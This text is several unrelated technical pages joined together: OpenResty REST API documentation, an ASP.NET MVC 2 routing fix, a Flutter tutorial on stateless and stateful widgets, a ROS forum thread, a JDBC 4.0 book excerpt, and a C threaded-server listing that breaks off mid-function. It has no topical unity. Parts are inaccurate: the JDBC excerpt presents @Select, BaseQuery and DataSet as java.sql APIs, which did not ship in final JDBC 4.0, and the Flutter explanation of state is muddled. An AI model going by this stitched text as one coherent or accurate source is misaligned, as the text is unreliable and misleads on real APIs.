Operations like creating and removing accounts are not part of the OpenResty web service API. Basically the sysadmin uses the following command to create an account on his server terminal:
$ bin/openresty adduser marry
and a similar command to remove one:
$ bin/openresty deluser marry
Multiple users can share the same set of objects in an account by logging in as different roles. And fine-grained access control can be achieved by specifying different sets of ACL rules for each role.
Every OpenResty account has two builtin roles throughout its lifetime: Admin and Public.
The Admin role always owns the most privileges, and its properties and ACL rule set are always read-only. The Public role is always anonymous, but its ACL rule set can be modified by a role with enough privileges.
An OpenResty role with access to the Role API (such as Admin) can create new roles, remove existing roles (except the two builtin roles explained above, of course), and modify the properties and ACL rules of other roles or even itself. For instance, to allow the Public role to perform the request GET /=/model/Post/id/<some number> under the same account, the Admin role could insert a corresponding access rule into the Public role's ACL rule set, like this:
POST /=/role/Public/~/~ HTTP/1.0
Content-Type: text/json
Content-Length: 45

{"method":"GET", "url":"/=/model/Post/id/~"}
The JSON structure in the POST content specifies an ACL rule. The tilde (~) character in the url value serves as a wildcard which matches "anything". So both GET /=/model/Post/id/1 and GET /=/model/Post/id/231 are allowed to be performed by the Public role.
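A sketch of how such tilde matching could work (hypothetical helper, not OpenResty's actual implementation):

```python
# Hypothetical per-segment matcher: '~' in a rule URL matches any single
# path segment of the request URL.
def acl_match(rule_url, request_url):
    rule = rule_url.strip("/").split("/")
    req = request_url.strip("/").split("/")
    if len(rule) != len(req):
        return False
    return all(r == "~" or r == q for r, q in zip(rule, req))

print(acl_match("/=/model/Post/id/~", "/=/model/Post/id/1"))      # True
print(acl_match("/=/model/Post/id/~", "/=/model/Post/id/231"))    # True
print(acl_match("/=/model/Post/id/~", "/=/model/Comment/id/1"))   # False
```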
Interestingly, it's also possible to grant the Public role privileges to augment its own ACL rule set in a similar way:
POST /=/role/Public/~/~ HTTP/1.0
Content-Type: text/json
Content-Length: 46

{"method":"POST", "url":"/=/role/Public/~/~"}
Every user accessing an OpenResty server must specify both its account name and its role name unless he or she has already logged in and got a session ID. For example, a typical HTTP request may look like this:
GET /=/model/Post/id/3?_user=agentzh.Public HTTP/1.0
In the above example, the _user parameter has the value agentzh.Public, where agentzh is the account name and Public the role name. Note that Public is an anonymous role; otherwise a _password or a _captcha parameter would be required here as well. This authentication method is called "per-request login".
Alternatively, the user can log in with his user name and MD5'd password first so as to obtain a session ID which can be used for subsequent requests. For example:
GET /=/login/agentzh.Admin/5f4dcc3b5aa765d61d8327deb882cf99 HTTP/1.0
will yield an HTTP response from the OpenResty server like this:
HTTP/1.0 200 OK
Connection: close
Content-Type: text/json; charset=UTF-8
Content-Length: 133
Date: Mon, 21 Apr 2008 11:51:49 GMT

{
  "success": 1,
  "session": "535F265E-0F99-11DD-B185-1A3EB9E8D9B0",
  "account": "agentzh",
  "role": "Admin"
}
And subsequent requests can be made by using the resulting session ID:
GET /=/model/Post/id/3?_session=535F265E-0F99-11DD-B185-1A3EB9E8D9B0
For convenience, the sample HTTP requests given throughout this document will not specify the _user nor the _session parameter explicitly.
It's worth mentioning that the simple MD5 treatment of passwords in the current implementation is merely a hack and will be changed in the near future. It's highly recommended to use SSL for the password login method for any serious uses.
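Incidentally, the digest in the sample login above is simply the MD5 hex digest of the literal string "password", which is easy to check:

```python
import hashlib

# MD5 of the literal password "password" -- the digest used in the
# sample GET /=/login request above.
digest = hashlib.md5(b"password").hexdigest()
print(digest)  # 5f4dcc3b5aa765d61d8327deb882cf99
print("GET /=/login/agentzh.Admin/%s HTTP/1.0" % digest)
```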
An OpenResty model is just an abstract concept of tables found in common relational databases. An instance of an OpenResty model could be a blog post:
{
  "description": "Blog post",
  "columns": [
    { "name": "title", "label": "Post title", "type": "text" },
    { "name": "content", "label": "Post content", "type": "text" },
    { "name": "author", "label": "Post author", "type": "text" },
    { "name": "created", "default": ["now()"],
      "type": "timestamp (0) with time zone",
      "label": "Post creation time" },
    { "name": "comments", "label": "Number of comments",
      "type": "integer", "default": 0 }
  ]
}
This is approximately the Post model used in my personal blog site. The rough SQL equivalent could be as follows:
create table "Post" (
    title text,
    content text,
    author text,
    created timestamp (0) with time zone default now(),
    comments integer default 0
)
Although the data storage backend may be truly implemented this way, the column types and names that can be used here are well defined and reasonably limited.
After creating a model, one can insert data via an HTTP POST request:
POST /=/model/Post/~/~ HTTP/1.0
Content-Type: text/json
Content-Length: 111

{
  "title": "My first post",
  "content": "Blah blah blah...",
  "author": "Agent Zhang"
}
Multiple rows can be inserted at a time as well, but there's a limit.
The model API not only offers interfaces to perform CRUD operations on models, columns, and rows, but also gives some simple but still powerful query functionalities. Here's an example:
GET /=/model/Post/author/agentzh?_order_by=created:desc&_count=10 HTTP/1.0
which is roughly equivalent to the following standard SQL query:
select * from "Post"
where "author" = 'agentzh'
order by created desc
limit 10
To address the problem of extending the limited data query interface provided by the model API, OpenResty integrates a view system in which the user can define reusable SQL-like queries by means of the RestyScript language. Here is an example:
POST /=/view/~ HTTP/1.0
Content-Type: text/json
Content-Length: 312

{
  "name": "CommentsToAuthor",
  "description": "Recent comments for the blog",
  "definition": "
    select Comment.sender as guest,
           Comment.body as comment_body
    from Comment, Post
    where Comment.id = Post.id and
          Post.author = $author"
}
In this sample, the string literal for the definition slot has been split into multiple lines for readability. The RestyScript language for views is just a (non-strict) subset of the standard SQL language, thus giving powerful structured query capability to the user, which is often a missing feature in those highly-distributed and semi-structured data storage solutions like CouchDB and SimpleDB.
Unlike SQL, however, a view definition can take one or more parameters (named placeholders) which must be given values when the view is invoked (unless they have a default value):
GET /=/view/CommentsToAuthor/author/agentzh
Or equivalently
GET /=/view/CommentsToAuthor/~/~?author=agentzh
The HTTP response from the OpenResty server might be
HTTP/1.0 200 OK
Connection: close
Content-Type: text/json; charset=UTF-8
Content-Length: 187
Date: Mon, 21 Apr 2008 12:42:15 GMT

[
  {"guest":"laser","comment_body":"super cool!"},
  {"guest":"carriezh","comment_body":"hello?hello?"},
  {"guest":"agentzh","comment_body":"Thanks for commenting!"}
]
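Consuming such a response requires nothing beyond ordinary HTTP and JSON handling. Here is a minimal Python sketch that splits a response into headers and parsed rows; the sample body below is a shortened version of the one above:

```python
import json

def parse_resty_response(raw):
    """Split a raw HTTP response into (header dict, parsed JSON body)."""
    head, body = raw.split("\r\n\r\n", 1)
    headers = dict(line.split(": ", 1) for line in head.split("\r\n")[1:])
    return headers, json.loads(body)

raw = ("HTTP/1.0 200 OK\r\n"
       "Content-Type: text/json; charset=UTF-8\r\n"
       "\r\n"
       '[{"guest":"laser","comment_body":"super cool!"},'
       '{"guest":"carriezh","comment_body":"hello?hello?"}]')
headers, rows = parse_resty_response(raw)
print([r["guest"] for r in rows])  # ['laser', 'carriezh']
```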
OpenResty offers the feed objects which can be used to map OpenResty views to RSS 2.0 feeds. For instance, the OpenResty feed object for my blog posts looks like this:
{
  "description": "Feed for blog posts",
  "author": "agentzh",
  "copyright": "Copyright 2008 by Yahoo! China EEEE Works",
  "language": "zh-cn",
  "title": "Posts for Human & Machine",
  "link": "",
  "logo": "",
  "view": "PostFeed"
}
and the PostFeed view used to generate this feed has the following definition:
{
  "description":"View for post feed",
  "definition": "
    select author, title,
           '-' || id as link,
           content,
           created as published,
           '-' || id || ':comments' as comments
    from Post
    order by created desc
    limit $count | 20
  "
}
Here the PostFeed view takes one optional parameter, $count (with the default value 20), which controls the number of result rows returned.
Not every view can be used to drive feed generation. The result rows of the view must have columns that make sense to the feed, like author, title, link, content, published, and comments.
After creating the Post feed in my agentzh account, one can subscribe to the feed via the following GET request:
GET /=/feed/Post/~/~ HTTP/1.0
Check to see what the actual response looks like.
One nice thing about the feed object is that it can forward arguments to the view that drives it:
GET /=/feed/Post/count/100 HTTP/1.0
This will produce the RSS 2.0 feed for the last 100 post entries rather than the default 20, giving more options to my blog readers.
An OpenResty action is a group of RestyScript commands with a name attached. Such a command can be either a SQL-like statement or an HTTP-like command.
An example of a SQL-like command is:
update Post set comments = comments + 1 where id = $post_id
In this update command, Post is the name of an OpenResty model (assuming it already exists), and $post_id is a parameter for the whole action (similar to view parameters).
An example of an HTTP-like command is:
POST '/=/model/Comment/~/~'
{ "sender": $sender, "body": $body, "post": $post_id }
Here the host part is omitted in the POST URL, so it defaults to the current OpenResty server being requested. If a full URL is specified here, one can do some really cool things by invoking the resources of some other OpenResty server.
Similarly, for a SQL-like command such as:
delete from Comment where post = $post_id and sender = $spammer
[TODO: an optional run on clause might be specified to run "SQL" on remote OpenResty servers if permitted.]
Furthermore, we can put multiple RestyScript commands together using the ; separator to define a full action object:
{
  "name": "PostComment",
  "description": "Action for posting a comment",
  "parameters":[
    {"name":"post_id","label":"Post ID","type":"literal"},
    {"name":"sender","label":"Sender","type":"literal","default":"agentzh"},
    {"name":"body","label":"Body","type":"literal"}
  ],
  "definition": "
    update Post set comments = comments + 1 where id = $post_id;
    POST '/=/model/Comment/~/~'
    { "sender": $sender, "body": $body, "post": $post_id }
  "
}
We still split the definition string into multiple lines for readability. The PostComment action defined here takes three parameters: $post_id, $sender, and $body.
One can invoke the PostComment action like this:
GET /=/action/PostComment/~/~?post_id=3&sender=marry&body=Haha HTTP/1.0
The server response would be an array of results, one for each command. If any of the commands fails, the whole action fails, and even previously successful commands get rolled back. That is, actions always run in a transaction.
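This all-or-nothing behavior can be sketched with a toy model; the code below illustrates the semantics only and is not OpenResty's implementation:

```python
def run_action(commands, state):
    """Run commands all-or-nothing: mutate a snapshot and keep it
    only if every command succeeds (a toy model of action semantics)."""
    working = dict(state)                    # snapshot to mutate
    results = []
    for cmd in commands:
        try:
            results.append(cmd(working))
        except Exception as exc:
            # any failure discards the snapshot: a rollback
            return state, [{"success": 0, "error": str(exc)}]
    return working, [{"success": 1} for _ in results]

def inc_comments(s):
    s["comments"] += 1          # like: update Post set comments = comments + 1

def failing_insert(s):
    raise RuntimeError("insert failed")   # like a rejected POST command

db = {"comments": 0}
db, out = run_action([inc_comments, failing_insert], db)
print(db["comments"], out[0]["success"])  # 0 0  (increment rolled back)
```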
With actions the user can encapsulate multiple OpenResty REST requests as well as SQL-like update and delete statements as a whole and reuse them as many times as he wishes. Such atomicity is very useful in the context of captcha authentication. (See the "Captchas" section for more information.)
More interestingly, it would be possible to call other actions or views within an action, or even the action itself (i.e. recursively). Special constraints would be imposed on the length of the action call chain, though, and there would also be a limit on the total number of commands grouped in an action.
Captchas are just another way to do "per-request login" in addition to the anonymous and password login methods.
Captcha support must be associated with some user-defined role whose "login" attribute is set to the value "captcha", like this:
POST /=/role/CommentPoster HTTP/1.0
Content-Type: text/json
Content-Length: 64

{"description":"Role for posting comments","login":"captcha"}
Therefore, it's not hard to see that it's not possible to do captchas with roles like Public or Admin.
Then we grant the CommentPoster role privileges for the operations that need to be performed by solving a captcha challenge:
POST /=/role/CommentPoster/~/~ HTTP/1.0
Content-Type: text/json
Content-Length: 48

{"method":"POST","url":"/=/model/Comment/~/~"}
Then the clients (like the JavaScript code in a web page) could do the following:
GET /=/captcha/id to obtain a captcha ID from the OpenResty server. Then, using the returned ID, say B44572D0-1038-11DD-B185-1A3EB9E8D9B0, fetch the captcha image:
GET /=/captcha/id/B44572D0-1038-11DD-B185-1A3EB9E8D9B0 HTTP/1.0
Once the user has typed in a solution, it is sent along with the protected request:
POST /=/model/Comment/~/~?_user=agentzh.CommentPoster\
     &_captcha=B44572D0-1038-11DD-B185-1A3EB9E8D9B0:pretty%20cat HTTP/1.0
Content-Type: text/json
Content-Length: 52

{"sender":"agentzh","body":"Good post!","post":25}
If the user solution pretty cat (i.e. "pretty%20cat") provided in the _captcha URL parameter is incorrect, the server rejects the whole POST operation.
The OpenResty server opens a special door to JavaScript code in web pages from other domains, so that REST requests can be initiated directly from the end user's web browser.
For GET requests, it is common practice to do cross-domain AJAX via dynamically created <script> tags. To help the page owner do this trick with an OpenResty server, the special _callback URL parameter is supported, which makes the server return the JSON data wrapped in some_callback_func( and );. For example, the request
GET /=/view/RecentPosts/~/~?_user=agentzh.Public&_callback=foo HTTP/1.0
yields something like this
HTTP/1.0 200 OK
Connection: close
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 74
Date: Mon, 21 Apr 2008 12:42:15 GMT

foo( [ {"title":"My first post","id":1}, {"title":"My second one","id":2} ] );
Note the extra foo(...) wrapper around the JSON data.
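Server-side, the _callback wrapping amounts to a one-line transformation. The sketch below illustrates the idea; the sanity check on the callback name is my own addition, not necessarily what OpenResty does:

```python
import json
import re

def wrap_callback(data, callback=None):
    """Serialize data as JSON, optionally wrapped in a JSONP callback
    (a sketch of what the _callback parameter triggers on the server)."""
    body = json.dumps(data)
    if callback is None:
        return body
    # reject callback names that could inject script into the page
    if not re.match(r"^[A-Za-z_$][A-Za-z0-9_$.]*$", callback):
        raise ValueError("unsafe callback name")
    return "%s(%s);" % (callback, body)

print(wrap_callback([{"id": 1}], "foo"))  # foo([{"id": 1}]);
```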
POST, PUT, and DELETE requests all have their GET variations:
GET /=/post/...
GET /=/put/...
GET /=/delete/...
where ... is the normal payload in POST /=/..., PUT /=/..., and DELETE /=/..., respectively. Some people might be nervous about GET requests doing data modification, but I can't think of a better way.
Cookies for authentication should always be excluded due to the risk of XSS attacks.
To overcome the length limit of URLs, a cross-site POST interface is also supported. Basically, the user can use an HTML form in his web page like the one below:
<form action="/=/model/Comment/~/~?_last_response=69bc45ec71ca7dc83cc"
      method="POST" onclick="onPostComment()" target="myHiddenFrame">
  <input type="hidden" name="data" value="{some JSON goes here...}">
</form>
<iframe id="myHiddenFrame" style="display: none"></iframe>
and the browser may initiate a POST request when submitting this form:
POST /=/model/Comment/~/~?_last_response=69bc45ec71ca7dc83cc HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

data={some JSON goes here...}
which is functionally equivalent to
POST /=/model/Comment/~/~
Content-Type: text/json
Content-Length: 23

{some JSON goes here...}
with the exception that the OpenResty server saves the response of the current POST request and allows the user to retrieve it later (using the same _last_response key):
GET /=/last/response/69bc45ec71ca7dc83cc
Note that the _last_response key 69bc45ec71ca7dc83cc used here should be randomly chosen and globally unique.
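A simple way for the client to generate such a key is a random UUID; a minimal sketch:

```python
import uuid

def last_response_key():
    """Generate a random, effectively globally unique key suitable
    for use as the _last_response parameter."""
    return uuid.uuid4().hex

k1, k2 = last_response_key(), last_response_key()
print(len(k1), k1 != k2)  # 32 True
```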
The "last response" mechanism is essential for the web page client to obtain the response of its POST request, because there is no (known) way for JavaScript code to directly "look" into the target frame (i.e. the myHiddenFrame iframe in the above sample) belonging to the OpenResty server's domain.
As you might have already noticed, two HTTP round-trips are required to do a true POST, which is a bit expensive. We'll use cross-site cookies (as well as P3P headers for IE) to deliver the response of POSTs to the JavaScript initiator.
In theory, any programming language or tool with basic HTTP 1.0/1.1 support has access to 100% of the OpenResty services.
But to make things even easier, there are currently two ad-hoc OpenResty client libraries, for JavaScript and Perl:
See.
See the WWW::OpenResty module on CPAN. Most of the time one would just use its subclass WWW::OpenResty::Simple which is much more handy IMHO ;)
Most of the sample apps' source code can be found at.
Agent Zhang
<agentzh@yahoo.cn>
Copyright (c) 2008 Yahoo! China EEEE Works, Alibaba::REST_cn, OpenResty, OpenResty::CheatSheet.
Ambiguous Controller Names With Areas
Note: This describes the behavior of ASP.NET MVC 2 as of the release candidate. It’s possible things might change for the RTM.
When using areas in ASP.NET MVC 2, a common problem you might encounter is this exception message.
The controller name ‘Home’ is ambiguous between the following types:
AreasDemoWeb.Controllers.HomeController
AreasDemoWeb.Areas.Blogs.Controllers.HomeController
This message is telling you that the controller factory found two types that match the route data for the current request. Typically this happens when you have a controller of the same name in an area and in the main project.
For example, in the screenshot below, notice that we have a HomeController in the main Controllers folder as well as in the Blogs area.
If you make a request for the area such as /Blogs/Home, you’ll find that everything works hunky-dory. However, if you make a request for the root HomeController, such as /Home, you’ll get the ambiguous controller exception.
Why is that?
When you register routes for an area, they get a namespace associated with each route. That ensures that only controllers within the namespace associated with that area can fulfill the request. Thus the request that matches an area will have that namespace and the namespace is used to disambiguate controllers.
But by default, the routes in the main application don’t have a namespace associated with them. That means the controller factory will scan all types looking for a match, and in this case finding two types which match the controller name “Home”.
The Fix
There are two very simple workarounds. The simplest falls in the “If it hurts, stop doing that” camp: simply avoid giving two controllers the same name.
For many situations, this is not a satisfactory answer. The other workaround, as you might guess from my explanation of why this happens, is to give the route in the main application a specific namespace. Here’s an example of the default route in Global.asax.cs which has the fix.
public static void RegisterRoutes(RouteCollection routes)
{
    routes.IgnoreRoute("{resource}.axd/{*pathInfo}");

    routes.MapRoute(
        "Default",                                              // Route name
        "{controller}/{action}/{id}",                           // URL
        new { controller = "Home", action = "Index", id = "" }, // Defaults
        new[] { "AreasDemoWeb.Controllers" }                    // Namespaces
    );
}
In the code above, I added a fourth parameter, which is an array of namespaces. The controllers for my project live in a namespace called AreasDemoWeb.Controllers.
Follow Up
In a follow-up post, I’ll walk through more details about areas and how namespaces play into routing and controller lookup. For now, I hope this gets you unstuck if you’ve run into this problem before.
Previously, we created a new application project, which comes by default with a demo application. We also looked at the various folders and files that are organized in the sample project and inspected each one for its purpose. Finally, we checked out the code within the main.dart file, which is the starting point for app execution, and had our first app run. Phew! That's some important info we have covered so far, and we're just getting started. In this article, we shall look at what widgets basically are and observe the two main categories of widgets on which flutter development mainly runs.
Read:
Article 1 - Setting Things up and Getting Started
Article 2 - Understanding App Structure and Anatomy
Article 3 - Understanding the main.dart and flow of execution - First run
What is a Widget?
Let's revisit the term "Widget" we looked at some time back in a previous article. A Widget can be termed as an individual component or a block of view that is presented either visibly or invisibly (let's look at these as we dive in further) on the app screen. In Flutter, everything we see or build to be presented on the view is a Widget. Even the entire app we run is itself considered a "Widget" by the flutter runtime. This enables us to create reusable components which are faster to load and can load asynchronously with respect to each other. It also lets us build an application in a modular manner rather than a monolithic one, and helps with fast reloading (or hot reloading, as flutter terms it), wherein only the changed "Widget" is reloaded over a code change instead of the entire application. This speeds up development as well.
Now coming to the visible and invisible part: when we build an application from modular blocks, with each block placed relative to the others, we need to arrange the blocks in a manner that gives a good user experience in the app. We arrange the blocks (or widgets) horizontally or vertically, in whatever order looks best for the user to interact with the app. This is what we call a Layout, and in Flutter we create layouts of widget arrangement by means of widgets again! These Layout widgets lay out their child widgets, or content widgets, in a defined manner over the screen. Since these widgets only form the skeletal structure of a layout and can't themselves be seen, we call them invisible. On the other hand, there are widgets such as a Text, Button, or Label which the user can see, laid out in some fashion by the invisible widgets; these we call Visible widgets.
Widgets - Stateless or Stateful?
When we run our application, internally the flutter runtime calls the "Widget" that has been passed to the runApp() method. This "Widget" is basically the entire thing that is shown on the screen. It uses the data that we pass to it for presentation (or no data at all, in cases like labels), and once the Widget has been rendered on the screen it remains "immutable", meaning there is nothing on the Widget to change or persist when the widget is reloaded on the screen. Each time the screen loads the widget, the widget is re-rendered with a new "state", with no memory of its old state. This kind of behavior is what we call "Stateless", and such Widgets are called "Stateless Widgets". The other kind of Widgets, which do keep memory of their previous "state", are called "Stateful Widgets".
"Stateless Widgets have no memory of their previous existence while Stateful widgets keep track of their old state."
A "State" is nothing but the data which has been presented or computed in a Widget's lifetime. When we kill the application or do some operation which refreshes the screen, this piece of computed or presented "data" on the Widget can either be discarded or be kept track of for future use. This behavior differentiates a Stateful Widget from a Stateless Widget.
Stateless Widgets and their volatile Memory
Let's take the example of a Button and a Counter, and the button shall increase the count of the counter whenever we tap on the button. Let's write a small Widget code for this presentation.
import 'package:flutter/material.dart';

class CounterPage extends StatelessWidget {
  int counter = 0;

  @override
  Widget build(BuildContext context) {
    return Scaffold(
      appBar: AppBar(
        title: Text('My App'),
      ),
      body: Column(
        children: <Widget>[
          Text('The Counter is $counter'),
          RaisedButton(
            child: Text('Click'),
            onPressed: () {
              counter++;
              print(counter);
            },
          )
        ],
      ),
    );
  }
}
In this case, we have a Button with an onPressed event handler that is invoked each time the button is tapped. And there we increment the counter which is also being shown over the screen. Theoretically this should work, but when we actually tap the button nothing happens; the counter stays there without any change.
And we can see that the counter is actually incremented, based on the console output we print within the button click handler. Why? Because even though tapping the button changes a variable internally, the change is never reported to the widget, so the widget is not reloaded.
"A Stateless widget never reloads keeping its data persistent overall."
The method responsible for a widget repaint is the build() method, which is invoked when a widget is to be presented on the app screen; but for a Stateless widget this seldom happens, and when it does, the entire widget along with the data variables it holds is reloaded with default values, causing the old values to be reset without any persistence. This is where the Stateful widget comes in handy: for widgets which need to hold a set of values over time.
Stateful Widgets and their Persistence
A Stateful widget, on the other hand, keeps track of a set of variables, on change of which the widget is repainted on the screen without those variables being reset. This helps us re-render some or all of the widget with the new changes applied to those variables. But creating a Stateful widget is a bit more complex than building a Stateless widget.
"A Stateful widget is a sort of Stateless Widget with an extra piece of State tracking."
A Stateful Widget is a widget class linked to a State class, and whenever the State changes; the Widget also changes. Let's try changing our CounterPage class into a Stateful widget as below:
import 'package:flutter/material.dart';

class CounterPageStateful extends StatefulWidget {
  @override
  State<StatefulWidget> createState() {
    return CounterPageState();
  }
}

class CounterPageState extends State<CounterPageStateful> {
  int counter = 0;

  @override
  Widget build(BuildContext context) {
    return Scaffold(
      appBar: AppBar(
        title: Text('My App'),
      ),
      body: Column(
        children: <Widget>[
          Text('The Counter is $counter'),
          RaisedButton(
            child: Text('Click'),
            onPressed: () {
              setState(() {
                counter++;
              });
              print(counter);
            },
          )
        ],
      ),
    );
  }
}
We have the CounterPageStateful widget, which extends StatefulWidget instead of the usual StatelessWidget. Then we have a separate CounterPageState class, which extends the State class typed with CounterPageStateful. Within the CounterPageStateful class, an instance of CounterPageState is returned from the createState() override method. What this means is that we basically create a two-way binding between the "Widget" and its "State". Whenever something in this "State" changes, the Widget's build() method is immediately invoked, repainting the widget on the screen. And since we need to maintain this "State" information outside of the Widget, so that it is not affected by a rebuild of the Widget, the State lives outside the Widget with an internal link. Observe the counter variable within the onPressed event handler of the button; it now sits inside a method called setState(). This method acts as a region wherein variables are modified and persisted over the repaint. Whenever something in this setState() call changes, build() is invoked, keeping hold of the changed values. Let's run this code now and look at our counter in action.
In this way, we can make use of Stateless and Stateful widgets depending on the kind of widgets we are trying to develop.
Despite having followed the outlined steps (creating the msg folder, changing CMakeLists.txt and package.xml, compiling and sourcing) and verifying the result (rosmsg list | grep Age displays Age inside my package), I still get ImportError: No module named odom_22.msg. Can anyone offer assistance?
My import line is from odom_22.msg import Age, and I double-checked that the msg directory is inside my package.
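For reference, the CMakeLists.txt stanzas typically needed for a custom message look like the following. The package name odom_22 and message Age are taken from the question, but this is a generic sketch, not the poster's actual file:

```cmake
# Declare message generation in the package's CMakeLists.txt
find_package(catkin REQUIRED COMPONENTS
  rospy
  std_msgs
  message_generation
)

add_message_files(
  FILES
  Age.msg
)

generate_messages(
  DEPENDENCIES
  std_msgs
)

catkin_package(
  CATKIN_DEPENDS rospy std_msgs message_runtime
)
```

package.xml additionally needs `<build_depend>message_generation</build_depend>` and `<exec_depend>message_runtime</exec_depend>` (or `<run_depend>` in older package formats), and the workspace's devel/setup.bash must be re-sourced after recompiling.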
asked 01 Oct '18, 21:31 by dylmyl1029
Never mind. I think the platform is just buggy. I restarted my computer and it works fine. Although now I have the rosdep view is empty: call 'sudo rosdep init' and 'rosdep update' when I try to run rostopic echo /age_info.
Hmmm, and now, even though I have changed nothing, it is giving me the original error again.
Got it. I had to recompile every time my page reloaded, then I could use roslaunch. When I switched to the other terminal window to check the output with rostopic echo /age_info, I had to recompile again in that window with roslaunch still running in the first one. Then the whole thing worked.
answered 02 Oct '18, 12:43
JDK 6 and JDBC 4.0 Advanced Concepts
This article addresses some of the advanced data management concepts starting with a new annotations capability added to the JDBC 4.0 specification.
Annotations
Annotations were introduced into the language with JDK 1.5, and now they are making an impact with JDBC 4.0. An annotation is a declarative programming model where comments, associated with a code element, are used to inject code at runtime.
The PreparedStatement example in this chapter can be rewritten as an annotation, greatly reducing the amount of code required by the application developer.
The annotation solution consists of two elements. The first is the declaration of a query interface extending the BaseQuery interface in the java.sql package. The second is a QueryObject used to execute the query.
Start by declaring the interface. You will not have to implement it; that is done for you based on the declared annotation. The annotation is @Select; it takes the SQL statement as a parameter and maps the method's parameters to the ?# IN parameters of the statement. Note that unlike the ResultSet object returned in the previous example (in Chapter 6 "Persisting Your Application Using Databases" Professional Java, JDK 6 Edition, Wrox, 2007, ISBN: 978-0-471-77710-6), the DataSet collection is typed with your user-defined class Car:
package wrox.ch6.jdbc;

import java.sql.BaseQuery;
import java.sql.DataSet;
import java.sql.Select;

public interface QueryAnnotationExample extends BaseQuery {
    @Select(sql="SELECT ID, MODEL, MODEL_YEAR FROM CAR WHERE MODEL_YEAR = ?1")
    public DataSet<Car> getCarsModelYear( String year );
}
Next, use the object factory to create and execute this statement. That is, by passing the query interface as a parameter, all the work was done for you, and the results are mapped to the collection of objects you specified in the interface:
public void testQueryAnnotation( ) {
    QueryAnnotationExample qae = null;
    try {
        String url = "jdbc:derby://localhost:1527/wrox;create=true";
        Connection con = DriverManager.getConnection(url, "APP", "password");
        qae = con.createQueryObject(QueryAnnotationExample.class);
    } catch (SQLException e) {
        e.printStackTrace();
    }
    Collection<Car> cars = qae.getCarsModelYear("1999");
Here is a simple loop to print out the results of the query:
    for ( Car c : cars) {
        System.out.println(" car id=" + c.getId() +
                           " model=" + c.getModel() +
                           " year=" + c.getYear() );
    }
}
When this query executes the output will be:
car id=1 model=Honda Accord year=null
You might be thinking, "The year parameter couldn't have been null. I was filtering on 1999. Why is the year parameter returning null from the query?"
The answer relates back to the Car class definition. The annotation API maps columns to properties by name. So ID mapped to id and MODEL mapped to model, but year didn't map to MODEL_YEAR as it was declared in the database. The solution is either to rename the field to match the database column or to add a column-name annotation to the Car class. @ResultColumn(name="MODEL_YEAR") tells the annotation API the name of the column to map to the year field.
import java.sql.ResultColumn;

public class Car {
    Long id;
    String model;
    @ResultColumn(name="MODEL_YEAR")
    String year;
If you re-execute the example, the model year will be populated with the correct information from the statement. That's a huge time saver compared to working with a traditional PreparedStatement.
The next section discusses supporting database transactions.
Managing Transactions
Transaction management is extremely important when dealing with data sources. Transaction management ensures data integrity and data consistency; without it, it would be very easy for applications to corrupt data sources or cause problems with the synchronization of the data. Therefore, all JDBC drivers are required to provide transaction support.
What Is a Transaction?
To explain transactions best, take using an ATM as an example. The steps to retrieve money are as follows:
- Swipe your ATM card.
- Enter your PIN.
- Select the withdrawal option.
- Enter the amount of money to withdraw.
- Agree to pay the extremely high fee.
- Collect your money.
If anything was to go wrong along the way and you didn't receive your money, you would definitely not want that to reflect on your balance. So a transaction encompasses all the preceding steps and has only two possible outcomes: commit or rollback. When a transaction commits, all the steps had to be successful. When a transaction fails, there should not be any damage done to the underlying data source. In this case, the data that stores your account balance!
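The commit-or-rollback contract can be sketched apart from any real database. The MiniTransaction class below is purely illustrative and is not part of JDBC; it just mimics the semantics described above:

```java
import java.util.ArrayList;
import java.util.List;

/** Minimal sketch of transactional commit/rollback semantics (not JDBC). */
public class MiniTransaction {
    private final List<String> committed = new ArrayList<>();
    private final List<String> pending = new ArrayList<>();

    /** Record a step; it is not permanent until commit(). */
    public void execute(String step) { pending.add(step); }

    /** All pending steps become permanent at once. */
    public void commit() {
        committed.addAll(pending);
        pending.clear();
    }

    /** Pending steps are discarded; committed data is untouched. */
    public void rollback() { pending.clear(); }

    public List<String> getCommitted() { return committed; }

    public static void main(String[] args) {
        MiniTransaction tx = new MiniTransaction();
        tx.execute("debit account");
        tx.execute("dispense cash");
        tx.rollback();               // something went wrong: no harm done
        tx.execute("debit account");
        tx.execute("dispense cash");
        tx.commit();                 // both steps succeed together
        System.out.println(tx.getCommitted().size());
    }
}
```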
Standard Transactions
JDBC transactions are extremely simple to manage. Transaction support is implemented by the DBMS, which eliminates your having to write anything — code-wise — that would be cumbersome. All the methods you need are contained in the Connection object. There are two main methods you need to be concerned about: Connection.commit and Connection.rollback. There isn't a begin transaction method because the beginning of a transaction is implied when the first SQL statement is executed.
JDBC 3.0 introduced a concept called a savepoint. Savepoints allow you to save moments in time inside a transaction. For example, you could have an application that sends a SQL statement, then invokes a savepoint, tries to send another SQL statement, but a problem arises and you have to rollback. Now instead of rolling back completely, you can choose to rollback to a given savepoint. The following code example demonstrates JDBC transactions and the new savepoint method, Connection.setSavepoint:
Statement stmt = cConn.createStatement();
int nRows = stmt.executeUpdate("INSERT INTO PLAYERS (NAME) " +
                               "VALUES ('Roger Thomas')");
// Create our save point
Savepoint spOne = cConn.setSavepoint("SAVE_POINT_ONE");
nRows = stmt.executeUpdate("INSERT INTO PLAYERS (NAME) " +
                           "VALUES ('Jennifer White')");
// Rollback to the original save point
cConn.rollback(spOne);
// Commit the transaction.
cConn.commit();
From this example, the second SQL statement never gets committed because it was rolled back to SAVE_POINT_ONE before the transaction was committed.
This article is adapted from Professional Java by W. Clay Richardson (Wrox, 2007, ISBN: 978-0-471-77710-6), from Chapter 6, "Persisting Your Application Using Databases."
Copyright 2007 by WROX. All rights reserved. Reproduced here by permission of the publisher.
|
http://www.codeguru.com/print/java/article.php/c13447/JDK-6-and-JDBC-40-Advanced-Concepts.htm
|
CC-MAIN-2015-27
|
refinedweb
| 1,013
| 50.53
|
A Multithreading Server
The multithreading_server shown in Listing 3 avoids the context-switch downside of the forking_server but faces challenges of its own. Each process has at least one thread of execution. A single multithreaded process has multiple threads. The threading_server is multithreaded.
Listing 3. threading_server.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <signal.h>
#include <pthread.h>
#include "utils.h"

/* thread routine */
void* handle_client(void* client_ptr) {
    pthread_detach(pthread_self()); /* terminates on return */

    /* read/write socket */
    int client = *((int*) client_ptr);

    /* request */
    char buffer[BUFF_SIZE + 1];
    bzero(buffer, sizeof(buffer));
    int bytes_read = recv(client, buffer, sizeof(buffer), 0);
    if (bytes_read < 0) error_msg("Problem with recv call", false);

    /* response */
